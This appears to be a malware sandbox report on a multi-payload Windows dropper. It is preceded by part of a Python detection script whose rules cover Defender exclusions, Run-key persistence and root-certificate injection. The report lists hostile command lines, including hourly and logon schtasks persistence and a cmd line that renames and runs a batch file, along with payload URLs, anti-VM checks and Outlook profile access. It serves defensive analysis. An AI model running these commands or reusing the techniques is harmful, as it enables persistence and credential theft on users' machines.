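     "target": r"HKU\S-1-5-19\Software\Microsoft\Cryptography\TPM\Telemetry\TraceTimeLast",
     "details": "QWORD (0x00000000-0x00000001)"},
]

SECURITY_CENTER_RE = re.compile(
    r"\\Microsoft\\Security Center\\(AntiVirus|AntiSpyware|Firewall|Updates)(Override|DisableNotify)$", re.I)
WUAUSERV_START_RE = re.compile(r"\\Services\\wuauserv\\Start$", re.I)
RUN_KEY_RE = re.compile(r"\\Microsoft\\Windows\\CurrentVersion\\Run(Once)?\\", re.I)
ROOT_CERT_RE = re.compile(r"\\SystemCertificates\\ROOT\\Certificates\\([0-9A-F]{40})\\Blob$", re.I)
DWORD_RE = re.compile(r"DWORD \(0x([0-9a-f]{8})\)", re.I)
IP_LOOKUP_HOSTS = {"ipinfo.io", "ip-api.com", "api.myip.com"}
HOSTING_HOSTS = {"pastebin.com", "bitbucket.org"}


@dataclass(frozen=True)
class Alert:
    rule: str
    severity: str
    image: str
    detail: str


def dword(details):
    """Sysmon renders DWORD data as 'DWORD (0x00000001)'; return it as an int."""
    m = DWORD_RE.fullmatch(details)
    return int(m.group(1), 16) if m else None


def check_registry(ev):
    target, details, image = ev["target"], ev["details"], ev["image"]
    if SECURITY_CENTER_RE.search(target) and dword(details) == 1:
        return Alert("security_center_override", "high", image, target)
    if WUAUSERV_START_RE.search(target) and dword(details) == 4:   # 4 = SERVICE_DISABLED
        return Alert("windows_update_disabled", "high", image, target)
    m = ROOT_CERT_RE.search(target)
    if m:
        return Alert("root_certificate_added", "high", image, m.group(1))
    if RUN_KEY_RE.search(target):
        # A Run entry pointing at a loose EXE in the Windows root is how
        # sysmablsvr.exe and winblrsnrcs.exe persist in this report.
        loose = re.fullmatch(r"C:\\Windows\\[^\\]+\.exe", details, re.I) is not None
        return Alert("run_key_persistence", "high" if loose else "medium", image, f"{target} = {details}")
    return None


def check_process(ev):
    cmd = ev["command_line"]
    if ev["image"].lower().endswith("powershell.exe") and re.search(r"Add-MpPreference\b.*-Exclusion", cmd, re.I):
        return Alert("defender_exclusion_added", "high", ev["image"], cmd)
    return None


def check_dns(ev):
    name = ev["query"].lower()
    if name in IP_LOOKUP_HOSTS:
        return Alert("external_ip_lookup", "low", ev["image"], name)
    if name in HOSTING_HOSTS:
        return Alert("hosting_service_contact", "low", ev["image"], name)
    return None


CHECKS = {13: check_registry, 1: check_process, 22: check_dns}


def evaluate(events):
    """Apply the check for each event type; returns alerts in event order."""
    alerts = []
    for ev in events:
        check = CHECKS.get(ev["id"])
        alert = check(ev) if check else None
        if alert is not None:
            alerts.append(alert)
    return alerts


if __name__ == "__main__":
    for a in evaluate(EVENTS):
        print(f"[{a.severity:<6}] {a.rule:<26} {a.image}  {a.detail}")
```

The DNS rules are deliberately low severity: ipinfo.io and pastebin.com are contacted by legitimate software too, so they are context for the high-severity registry and process alerts rather than alerts in their own right.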
Suspicious behavior: EnumeratesProcesses 64 IoCs
pid | Process (consecutive identical rows collapsed with their count)
4784 | httpscontrole-bitvavo.comchecknuuBitvavo-scanner.exe.exe (x2)
1712 | http77.91.77.80mineamadka.exe.exe (x2)
4808 | explortu.exe (x2)
5052 | explortu.exe (x2)
1452 | http77.91.77.82mineamadka.exe.exe (x2)
3188 | chrome.exe (x2)
6100 | 1453930929.exe (x2)
5336 | powershell.exe (x4)
5284 | http106.166.173.36imgtest.exe.exe
3292 | http106.166.173.36imgtest.exe.exe
5204 | http77.91.77.82lendfileosn.exe.exe (x4)
6064 | http77.91.77.82lendinstaller2.exe.exe (x3)
6660 | http77.91.77.81lendinstaller2.exe.exe (x2)
2952 | c05a20d254.exe (x2)
6560 | powershell.exe (x3)
6100 | 1453930929.exe (x2)
6560 | powershell.exe
6292 | http77.91.77.82lendIerLRtXpEcMnUjz.exe.exe (x3)
5476 | explortu.exe (x2)
5704 | http77.91.77.81lend37.exe.exe (x6)
3840 | http77.91.77.81lend27.exe.exe (x4)
5704 | http77.91.77.81lend37.exe.exe
3840 | http77.91.77.81lend27.exe.exe
5704 | http77.91.77.81lend37.exe.exe
3840 | http77.91.77.81lend27.exe.exe
5704 | http77.91.77.81lend37.exe.exe (x6)
3840 | http77.91.77.81lend27.exe.exe (x2)
Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary 4 IoCs
pid Process 3188 chrome.exe 3188 chrome.exe 3188 chrome.exe 3188 chrome.exe -
Suspicious use of AdjustPrivilegeToken 64 IoCs
The SeDebugPrivilege requests come from Setup.exe (4616), One.exe (5596), powershell.exe (5336) and the two lendlook payloads (5272, 5612); the alternating SeShutdownPrivilege / SeCreatePagefilePrivilege rows are chrome.exe's own behaviour rather than the payloads'.
description | pid | Process (consecutive chrome.exe pairs collapsed with their count)
Token: SeDebugPrivilege | 4616 | Setup.exe
Token: SeShutdownPrivilege / SeCreatePagefilePrivilege | 3188 | chrome.exe (8 alternating pairs, 16 entries)
Token: SeDebugPrivilege | 5596 | One.exe
Token: SeShutdownPrivilege / SeCreatePagefilePrivilege | 3188 | chrome.exe (11 alternating pairs, 22 entries)
Token: SeDebugPrivilege | 5336 | powershell.exe
Token: SeShutdownPrivilege / SeCreatePagefilePrivilege | 3188 | chrome.exe (2 alternating pairs, 4 entries)
Token: SeDebugPrivilege | 5272 | http77.91.77.82lendlook.exe.exe
Token: SeShutdownPrivilege / SeCreatePagefilePrivilege | 3188 | chrome.exe (1 pair, 2 entries)
Token: SeDebugPrivilege | 5612 | http77.91.77.81lendlook.exe.exe
Token: SeShutdownPrivilege / SeCreatePagefilePrivilege | 3188 | chrome.exe (2 alternating pairs, 4 entries)
Token: SeIncreaseQuotaPrivilege | 5336 | powershell.exe
Token: SeSecurityPrivilege | 5336 | powershell.exe
Token: SeTakeOwnershipPrivilege | 5336 | powershell.exe
Token: SeLoadDriverPrivilege | 5336 | powershell.exe
Token: SeSystemProfilePrivilege | 5336 | powershell.exe
Token: SeSystemtimePrivilege | 5336 | powershell.exe
Token: SeProfSingleProcessPrivilege | 5336 | powershell.exe
Token: SeIncBasePriorityPrivilege | 5336 | powershell.exe
Token: SeCreatePagefilePrivilege | 5336 | powershell.exe
Token: SeBackupPrivilege | 5336 | powershell.exe
Token: SeRestorePrivilege | 5336 | powershell.exe
Suspicious use of FindShellTrayWindow 64 IoCs
pid Process 4176 httpscontrole-bitvavo.comchecknuuBitvavo-scanner.exe.exe 4176 httpscontrole-bitvavo.comchecknuuBitvavo-scanner.exe.exe 4176 httpscontrole-bitvavo.comchecknuuBitvavo-scanner.exe.exe 1712 http77.91.77.80mineamadka.exe.exe 1056 4e6762088f.exe 1056 4e6762088f.exe 3188 chrome.exe 3188 chrome.exe 3188 chrome.exe 3188 chrome.exe 3188 chrome.exe 3188 chrome.exe 3188 chrome.exe 3188 chrome.exe 3188 chrome.exe 3188 chrome.exe 3188 chrome.exe 3188 chrome.exe 3188 chrome.exe 3188 chrome.exe 3188 chrome.exe 3188 chrome.exe 3188 chrome.exe 3188 chrome.exe 3188 chrome.exe 3188 chrome.exe 3188 chrome.exe 3188 chrome.exe 3188 chrome.exe 3188 chrome.exe 3188 chrome.exe 3188 chrome.exe 1056 4e6762088f.exe 1056 4e6762088f.exe 3188 chrome.exe 1056 4e6762088f.exe 1056 4e6762088f.exe 1056 4e6762088f.exe 1056 4e6762088f.exe 1056 4e6762088f.exe 1056 4e6762088f.exe 1056 4e6762088f.exe 1056 4e6762088f.exe 1056 4e6762088f.exe 1056 4e6762088f.exe 1056 4e6762088f.exe 1056 4e6762088f.exe 1056 4e6762088f.exe 1056 4e6762088f.exe 1056 4e6762088f.exe 1056 4e6762088f.exe 1056 4e6762088f.exe 1056 4e6762088f.exe 1056 4e6762088f.exe 1056 4e6762088f.exe 1056 4e6762088f.exe 1056 4e6762088f.exe 1056 4e6762088f.exe 1056 4e6762088f.exe 1056 4e6762088f.exe 1056 4e6762088f.exe 1056 4e6762088f.exe 1056 4e6762088f.exe 1056 4e6762088f.exe -
Suspicious use of SendNotifyMessage 64 IoCs
pid Process 4176 httpscontrole-bitvavo.comchecknuuBitvavo-scanner.exe.exe 4176 httpscontrole-bitvavo.comchecknuuBitvavo-scanner.exe.exe 4176 httpscontrole-bitvavo.comchecknuuBitvavo-scanner.exe.exe 1056 4e6762088f.exe 1056 4e6762088f.exe 3188 chrome.exe 3188 chrome.exe 3188 chrome.exe 3188 chrome.exe 3188 chrome.exe 3188 chrome.exe 3188 chrome.exe 3188 chrome.exe 3188 chrome.exe 3188 chrome.exe 3188 chrome.exe 3188 chrome.exe 3188 chrome.exe 3188 chrome.exe 3188 chrome.exe 3188 chrome.exe 3188 chrome.exe 3188 chrome.exe 3188 chrome.exe 3188 chrome.exe 3188 chrome.exe 3188 chrome.exe 3188 chrome.exe 3188 chrome.exe 1056 4e6762088f.exe 1056 4e6762088f.exe 1056 4e6762088f.exe 1056 4e6762088f.exe 1056 4e6762088f.exe 1056 4e6762088f.exe 1056 4e6762088f.exe 1056 4e6762088f.exe 1056 4e6762088f.exe 1056 4e6762088f.exe 1056 4e6762088f.exe 1056 4e6762088f.exe 1056 4e6762088f.exe 1056 4e6762088f.exe 1056 4e6762088f.exe 1056 4e6762088f.exe 1056 4e6762088f.exe 1056 4e6762088f.exe 1056 4e6762088f.exe 1056 4e6762088f.exe 1056 4e6762088f.exe 1056 4e6762088f.exe 1056 4e6762088f.exe 1056 4e6762088f.exe 1056 4e6762088f.exe 1056 4e6762088f.exe 1056 4e6762088f.exe 1056 4e6762088f.exe 1056 4e6762088f.exe 1056 4e6762088f.exe 1056 4e6762088f.exe 1056 4e6762088f.exe 1056 4e6762088f.exe 1056 4e6762088f.exe 6944 iydVgMPpiA_b127o2yze.exe -
Suspicious use of SetWindowsHookEx 1 IoCs
SetWindowsHookEx is the classic way to install a keyboard or message hook; here it is the same process that reads Outlook profiles and drops the Startup .lnk.
pid | Process
2952 | c05a20d254.exe
Suspicious use of WriteProcessMemory 64 IoCs
Read as a process tree: each "wrote to memory of" row is the writer starting that child (the report records the memory writes that accompany process creation, which is why identical rows repeat). The tree it gives is: Setup.exe (4616) starts 1304 pei.exe, 1504 twizt, 3908 Bitvavo-scanner, 1736 tiktok, 1712 mineamadka (77.91.77.80) and 1452 mineamadka (77.91.77.82); 1504 starts 2124 sysmablsvr.exe, which starts 2272; 1304 starts 2632; 3908 starts 4784 and 4176; 1712 starts 4808 explortu.exe, which starts 1724, 2952 c05a20d254.exe and 1056 4e6762088f.exe; 1056 starts 3188 chrome.exe.
pid | Process | target pid | procid_target (identical rows collapsed with their count)
4616 | Setup.exe | wrote to memory of 1304 | 74 (x3)
4616 | Setup.exe | wrote to memory of 1504 | 75 (x3)
1504 | httptwizt.netnewtpp.exe.exe | wrote to memory of 2124 | 76 (x3)
4616 | Setup.exe | wrote to memory of 3908 | 77 (x3)
4616 | Setup.exe | wrote to memory of 1736 | 78 (x3)
1304 | http185.215.113.66pei.exe.exe | wrote to memory of 2632 | 79 (x3)
3908 | httpscontrole-bitvavo.comchecknuuBitvavo-scanner.exe.exe | wrote to memory of 4784 | 80 (x3)
3908 | httpscontrole-bitvavo.comchecknuuBitvavo-scanner.exe.exe | wrote to memory of 4176 | 81 (x3)
4616 | Setup.exe | wrote to memory of 1712 | 83 (x3)
1712 | http77.91.77.80mineamadka.exe.exe | wrote to memory of 4808 | 84 (x3)
4616 | Setup.exe | wrote to memory of 1452 | 86 (x3)
4808 | explortu.exe | wrote to memory of 1724 | 87 (x3)
2124 | sysmablsvr.exe | wrote to memory of 2272 | 88 (x3)
4808 | explortu.exe | wrote to memory of 2952 | 89 (x3)
4808 | explortu.exe | wrote to memory of 1056 | 90 (x3)
1056 | 4e6762088f.exe | wrote to memory of 3188 | 91 (x2)
3188 | chrome.exe | wrote to memory of 1032 | 93 (x2)
3188 | chrome.exe | wrote to memory of 1124 | 94 (x15)
Uses Task Scheduler COM API 1 TTPs
The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.
-
outlook_office_path 1 IoCs
| description | ioc | Process |
|---|---|---|
| Key opened | \REGISTRY\USER\S-1-5-21-4106386276-4127174233-3637007343-1000\Software\Microsoft\Office\16.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676 | c05a20d254.exe |
outlook_win_path 1 IoCs
| description | ioc | Process |
|---|---|---|
| Key opened | \REGISTRY\USER\S-1-5-21-4106386276-4127174233-3637007343-1000\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676 | c05a20d254.exe |
Processes

Each entry is "image path | command line | PID", indented by process depth, with the behaviours attributed to that process listed beneath it.

C:\Windows\Explorer.EXE | C:\Windows\Explorer.EXE | PID:3380
  C:\Users\Admin\AppData\Local\Temp\Setup.exe | "C:\Users\Admin\AppData\Local\Temp\Setup.exe" | PID:4616
    - Suspicious use of AdjustPrivilegeToken
    - Suspicious use of WriteProcessMemory
    C:\Users\Admin\AppData\Local\Temp\http185.215.113.66pei.exe.exe | "C:\Users\Admin\AppData\Local\Temp\http185.215.113.66pei.exe.exe" | PID:1304
      - Executes dropped EXE
      - Suspicious use of WriteProcessMemory
      C:\Users\Admin\AppData\Local\Temp\143303174.exe | C:\Users\Admin\AppData\Local\Temp\143303174.exe | PID:2632
        - Executes dropped EXE
    C:\Users\Admin\AppData\Local\Temp\httptwizt.netnewtpp.exe.exe | "C:\Users\Admin\AppData\Local\Temp\httptwizt.netnewtpp.exe.exe" | PID:1504
      - Executes dropped EXE
      - Adds Run key to start application
      - Drops file in Windows directory
      - Suspicious use of WriteProcessMemory
      C:\Windows\sysmablsvr.exe | C:\Windows\sysmablsvr.exe | PID:2124
        - Modifies security service
        - Windows security bypass
        - Executes dropped EXE
        - Windows security modification
        - Suspicious use of WriteProcessMemory
        C:\Users\Admin\AppData\Local\Temp\406625063.exe | C:\Users\Admin\AppData\Local\Temp\406625063.exe | PID:2272
          - Executes dropped EXE
        C:\Users\Admin\AppData\Local\Temp\952927809.exe | C:\Users\Admin\AppData\Local\Temp\952927809.exe | PID:5240
          - Executes dropped EXE
          C:\Users\Admin\AppData\Local\Temp\1453930929.exe | C:\Users\Admin\AppData\Local\Temp\1453930929.exe | PID:6100
            - Suspicious use of NtCreateUserProcessOtherParentProcess
            - Executes dropped EXE
            - Suspicious behavior: EnumeratesProcesses
        C:\Users\Admin\AppData\Local\Temp\2026229022.exe | C:\Users\Admin\AppData\Local\Temp\2026229022.exe | PID:5136
          - Executes dropped EXE
        C:\Users\Admin\AppData\Local\Temp\3235322023.exe | C:\Users\Admin\AppData\Local\Temp\3235322023.exe | PID:5264
          - Executes dropped EXE
          - Adds Run key to start application
          - Drops file in Windows directory
          C:\Windows\winblrsnrcs.exe | C:\Windows\winblrsnrcs.exe | PID:6044
            - Modifies security service
            - Windows security bypass
            - Executes dropped EXE
            - Windows security modification
            C:\Users\Admin\AppData\Local\Temp\1338716755.exe | C:\Users\Admin\AppData\Local\Temp\1338716755.exe | PID:6220
              - Executes dropped EXE
            C:\Users\Admin\AppData\Local\Temp\1222811284.exe | C:\Users\Admin\AppData\Local\Temp\1222811284.exe | PID:3192
            C:\Users\Admin\AppData\Local\Temp\1621838176.exe | C:\Users\Admin\AppData\Local\Temp\1621838176.exe | PID:424
            C:\Users\Admin\AppData\Local\Temp\1144214468.exe | C:\Users\Admin\AppData\Local\Temp\1144214468.exe | PID:7636
    C:\Users\Admin\AppData\Local\Temp\httpscontrole-bitvavo.comchecknuuBitvavo-scanner.exe.exe | "C:\Users\Admin\AppData\Local\Temp\httpscontrole-bitvavo.comchecknuuBitvavo-scanner.exe.exe" | PID:3908
      - Executes dropped EXE
      - Checks processor information in registry
      - Suspicious use of WriteProcessMemory
      C:\Users\Admin\AppData\Local\Temp\httpscontrole-bitvavo.comchecknuuBitvavo-scanner.exe.exe | "C:\Users\Admin\AppData\Local\Temp\httpscontrole-bitvavo.comchecknuuBitvavo-scanner.exe.exe" --local-service | PID:4784
        - Executes dropped EXE
        - Suspicious behavior: EnumeratesProcesses
      C:\Users\Admin\AppData\Local\Temp\httpscontrole-bitvavo.comchecknuuBitvavo-scanner.exe.exe | "C:\Users\Admin\AppData\Local\Temp\httpscontrole-bitvavo.comchecknuuBitvavo-scanner.exe.exe" --local-control | PID:4176
        - Executes dropped EXE
        - Suspicious use of FindShellTrayWindow
        - Suspicious use of SendNotifyMessage
    C:\Users\Admin\AppData\Local\Temp\http185.172.128.127tiktok.exe.exe | "C:\Users\Admin\AppData\Local\Temp\http185.172.128.127tiktok.exe.exe" | PID:1736
      - Executes dropped EXE
    C:\Users\Admin\AppData\Local\Temp\http77.91.77.80mineamadka.exe.exe | "C:\Users\Admin\AppData\Local\Temp\http77.91.77.80mineamadka.exe.exe" | PID:1712
      - Identifies VirtualBox via ACPI registry values (likely anti-VM)
      - Checks BIOS information in registry
      - Executes dropped EXE
      - Identifies Wine through registry keys
      - Suspicious use of NtSetInformationThreadHideFromDebugger
      - Drops file in Windows directory
      - Suspicious behavior: EnumeratesProcesses
      - Suspicious use of FindShellTrayWindow
      - Suspicious use of WriteProcessMemory
      C:\Users\Admin\AppData\Local\Temp\9217037dc9\explortu.exe | "C:\Users\Admin\AppData\Local\Temp\9217037dc9\explortu.exe" | PID:4808
        - Identifies VirtualBox via ACPI registry values (likely anti-VM)
        - Checks BIOS information in registry
        - Executes dropped EXE
        - Identifies Wine through registry keys
        - Adds Run key to start application
        - Suspicious use of NtSetInformationThreadHideFromDebugger
        - Suspicious behavior: EnumeratesProcesses
        - Suspicious use of WriteProcessMemory
        C:\Users\Admin\AppData\Local\Temp\9217037dc9\explortu.exe | "C:\Users\Admin\AppData\Local\Temp\9217037dc9\explortu.exe" | PID:1724
        C:\Users\Admin\AppData\Local\Temp\1000016001\c05a20d254.exe | "C:\Users\Admin\AppData\Local\Temp\1000016001\c05a20d254.exe" | PID:2952
          - Drops startup file
          - Executes dropped EXE
          - Accesses Microsoft Outlook profiles
          - Adds Run key to start application
          - Suspicious use of NtSetInformationThreadHideFromDebugger
          - Checks processor information in registry
          - Suspicious behavior: EnumeratesProcesses
          - Suspicious use of SetWindowsHookEx
          - outlook_office_path
          - outlook_win_path
          C:\Windows\SysWOW64\schtasks.exe | schtasks /create /f /RU "Admin" /tr "C:\ProgramData\MPGPH131\MPGPH131.exe" /tn "MPGPH131 HR" /sc HOURLY /rl HIGHEST | PID:5876
            - Creates scheduled task(s)
          C:\Windows\SysWOW64\schtasks.exe | schtasks /create /f /RU "Admin" /tr "C:\ProgramData\MPGPH131\MPGPH131.exe" /tn "MPGPH131 LG" /sc ONLOGON /rl HIGHEST | PID:4772
            - Creates scheduled task(s)
          C:\Windows\SysWOW64\schtasks.exe | schtasks /create /f /RU "Admin" /tr "C:\ProgramData\MSIUpdaterV131_30f85fd004d4df68ea1f8d35c18db496\MSIUpdaterV131.exe" /tn "MSIUpdaterV131_30f85fd004d4df68ea1f8d35c18db496 HR" /sc HOURLY /rl HIGHEST | PID:6548
            - Creates scheduled task(s)
          C:\Windows\SysWOW64\schtasks.exe | schtasks /create /f /RU "Admin" /tr "C:\ProgramData\MSIUpdaterV131_30f85fd004d4df68ea1f8d35c18db496\MSIUpdaterV131.exe" /tn "MSIUpdaterV131_30f85fd004d4df68ea1f8d35c18db496 LG" /sc ONLOGON /rl HIGHEST | PID:4608
            - Creates scheduled task(s)
          C:\Users\Admin\AppData\Local\Temp\spanvVEDIBgJWzvi\iydVgMPpiA_b127o2yze.exe | "C:\Users\Admin\AppData\Local\Temp\spanvVEDIBgJWzvi\iydVgMPpiA_b127o2yze.exe" | PID:6944
            - Suspicious use of SendNotifyMessage
          C:\Windows\SysWOW64\schtasks.exe | schtasks /create /f /RU "Admin" /tr "C:\ProgramData\MSIUpdaterV131_f09ac2d587354c6431bf93812ba7548f\MSIUpdaterV131.exe" /tn "MSIUpdaterV131_f09ac2d587354c6431bf93812ba7548f HR" /sc HOURLY /rl HIGHEST | PID:4080
            - Creates scheduled task(s)
          C:\Windows\SysWOW64\schtasks.exe | schtasks /create /f /RU "Admin" /tr "C:\ProgramData\MSIUpdaterV131_f09ac2d587354c6431bf93812ba7548f\MSIUpdaterV131.exe" /tn "MSIUpdaterV131_f09ac2d587354c6431bf93812ba7548f LG" /sc ONLOGON /rl HIGHEST | PID:6448
            - Creates scheduled task(s)
          C:\Users\Admin\AppData\Local\Temp\spanvVEDIBgJWzvi\lSgwDkC55WYzEXIFfTF0.exe | "C:\Users\Admin\AppData\Local\Temp\spanvVEDIBgJWzvi\lSgwDkC55WYzEXIFfTF0.exe" | PID:4136
          C:\Windows\SysWOW64\schtasks.exe | schtasks /create /f /RU "Admin" /tr "C:\ProgramData\MSIUpdaterV131_0e77e820e5c00ed5b0585a4d674a2e51\MSIUpdaterV131.exe" /tn "MSIUpdaterV131_0e77e820e5c00ed5b0585a4d674a2e51 HR" /sc HOURLY /rl HIGHEST | PID:6524
            - Creates scheduled task(s)
          C:\Windows\SysWOW64\schtasks.exe | schtasks /create /f /RU "Admin" /tr "C:\ProgramData\MSIUpdaterV131_0e77e820e5c00ed5b0585a4d674a2e51\MSIUpdaterV131.exe" /tn "MSIUpdaterV131_0e77e820e5c00ed5b0585a4d674a2e51 LG" /sc ONLOGON /rl HIGHEST | PID:6508
            - Creates scheduled task(s)
          C:\Users\Admin\AppData\Local\Temp\spanvVEDIBgJWzvi\gA52NWlcCoqkZ_3pKAy9.exe | "C:\Users\Admin\AppData\Local\Temp\spanvVEDIBgJWzvi\gA52NWlcCoqkZ_3pKAy9.exe" | PID:5908
        C:\Users\Admin\AppData\Local\Temp\1000017001\4e6762088f.exe | "C:\Users\Admin\AppData\Local\Temp\1000017001\4e6762088f.exe" | PID:1056
          - Executes dropped EXE
          - Suspicious use of FindShellTrayWindow
          - Suspicious use of SendNotifyMessage
          - Suspicious use of WriteProcessMemory
          C:\Program Files\Google\Chrome\Application\chrome.exe | "C:\Program Files\Google\Chrome\Application\chrome.exe" https://www.youtube.com/account | PID:3188
            - Enumerates system info in registry
            - Modifies data under HKEY_USERS
            - Suspicious behavior: EnumeratesProcesses
            - Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary
            - Suspicious use of AdjustPrivilegeToken
            - Suspicious use of FindShellTrayWindow
            - Suspicious use of SendNotifyMessage
            - Suspicious use of WriteProcessMemory
            C:\Program Files\Google\Chrome\Application\chrome.exe | "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" --url=https://clients2.google.com/cr/report --annotation=channel= --annotation=plat=Win64 --annotation=prod=Chrome --annotation=ver=106.0.5249.119 --initial-client-data=0xcc,0xd0,0xd4,0xa8,0xd8,0x7ff800759758,0x7ff800759768,0x7ff800759778 | PID:1032
            C:\Program Files\Google\Chrome\Application\chrome.exe | "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=gpu-process --gpu-preferences=UAAAAAAAAADgAAAYAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAQAAAAAAAAAAAAAAAAAAAAAAAAAEgAAAAAAAAASAAAAAAAAAAYAAAAAgAAABAAAAAAAAAAGAAAAAAAAAAQAAAAAAAAAAAAAAAOAAAAEAAAAAAAAAABAAAADgAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=1532 --field-trial-handle=1808,i,3044853489216839092,12732157013144933862,131072 /prefetch:2 | PID:1124
            C:\Program Files\Google\Chrome\Application\chrome.exe | "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=1792 --field-trial-handle=1808,i,3044853489216839092,12732157013144933862,131072 /prefetch:8 | PID:2904
            C:\Program Files\Google\Chrome\Application\chrome.exe | "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=2068 --field-trial-handle=1808,i,3044853489216839092,12732157013144933862,131072 /prefetch:8 | PID:5052
            C:\Program Files\Google\Chrome\Application\chrome.exe | "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --display-capture-permissions-policy-allowed --first-renderer-process --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --mojo-platform-channel-handle=2848 --field-trial-handle=1808,i,3044853489216839092,12732157013144933862,131072 /prefetch:1 | PID:4436
            C:\Program Files\Google\Chrome\Application\chrome.exe | "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --display-capture-permissions-policy-allowed --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --mojo-platform-channel-handle=2856 --field-trial-handle=1808,i,3044853489216839092,12732157013144933862,131072 /prefetch:1 | PID:4612
            C:\Program Files\Google\Chrome\Application\chrome.exe | "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --display-capture-permissions-policy-allowed --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=7 --mojo-platform-channel-handle=3852 --field-trial-handle=1808,i,3044853489216839092,12732157013144933862,131072 /prefetch:1 | PID:2844
            C:\Program Files\Google\Chrome\Application\chrome.exe | "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --display-capture-permissions-policy-allowed --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=8 --mojo-platform-channel-handle=3240 --field-trial-handle=1808,i,3044853489216839092,12732157013144933862,131072 /prefetch:1 | PID:3500
            C:\Program Files\Google\Chrome\Application\chrome.exe | "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=audio.mojom.AudioService --lang=en-US --service-sandbox-type=audio --mojo-platform-channel-handle=4432 --field-trial-handle=1808,i,3044853489216839092,12732157013144933862,131072 /prefetch:8 | PID:4612
            C:\Program Files\Google\Chrome\Application\chrome.exe | "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=video_capture.mojom.VideoCaptureService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=4600 --field-trial-handle=1808,i,3044853489216839092,12732157013144933862,131072 /prefetch:8 | PID:4728
            C:\Program Files\Google\Chrome\Application\chrome.exe | "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --mojo-platform-channel-handle=5212 --field-trial-handle=1808,i,3044853489216839092,12732157013144933862,131072 /prefetch:8 | PID:5304
            C:\Program Files\Google\Chrome\Application\chrome.exe | "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.ProcessorMetrics --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=5508 --field-trial-handle=1808,i,3044853489216839092,12732157013144933862,131072 /prefetch:8 | PID:5348
            C:\Program Files\Google\Chrome\Application\chrome.exe | "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=5420 --field-trial-handle=1808,i,3044853489216839092,12732157013144933862,131072 /prefetch:8 | PID:5452
    C:\Users\Admin\AppData\Local\Temp\http77.91.77.82mineamadka.exe.exe | "C:\Users\Admin\AppData\Local\Temp\http77.91.77.82mineamadka.exe.exe" | PID:1452
      - Identifies VirtualBox via ACPI registry values (likely anti-VM)
      - Checks BIOS information in registry
      - Executes dropped EXE
      - Identifies Wine through registry keys
      - Suspicious use of NtSetInformationThreadHideFromDebugger
      - Suspicious behavior: EnumeratesProcesses
    C:\Users\Admin\AppData\Local\Temp\http77.91.77.82lendalex.exe.exe | "C:\Users\Admin\AppData\Local\Temp\http77.91.77.82lendalex.exe.exe" | PID:5272
      - Executes dropped EXE
      - Suspicious use of SetThreadContext
      C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe" | PID:5412
        C:\Users\Admin\AppData\Roaming\configurationValue\svhoost.exe | "C:\Users\Admin\AppData\Roaming\configurationValue\svhoost.exe" | PID:5580
          - Executes dropped EXE
          - Modifies system certificate store
        C:\Users\Admin\AppData\Roaming\configurationValue\One.exe | "C:\Users\Admin\AppData\Roaming\configurationValue\One.exe" | PID:5596
          - Executes dropped EXE
          - Suspicious use of AdjustPrivilegeToken
    C:\Users\Admin\AppData\Local\Temp\http77.91.77.82lendw.exe.exe | "C:\Users\Admin\AppData\Local\Temp\http77.91.77.82lendw.exe.exe" | PID:5984
      - Executes dropped EXE
      C:\Users\Admin\AppData\Local\Temp\s.exe | "C:\Users\Admin\AppData\Local\Temp\s.exe" | PID:6056
        - Identifies VirtualBox via ACPI registry values (likely anti-VM)
        - Checks BIOS information in registry
        - Executes dropped EXE
        - Checks whether UAC is enabled
        - Suspicious use of NtSetInformationThreadHideFromDebugger
    C:\Users\Admin\AppData\Local\Temp\http77.91.77.82lend228.exe.exe | "C:\Users\Admin\AppData\Local\Temp\http77.91.77.82lend228.exe.exe" | PID:6128
      - Executes dropped EXE
      C:\Windows\SysWOW64\cmd.exe | "C:\Windows\System32\cmd.exe" /k move Descriptions Descriptions.cmd & Descriptions.cmd & exit | PID:5684
        C:\Windows\SysWOW64\tasklist.exe | tasklist | PID:7484
          - Enumerates processes with tasklist
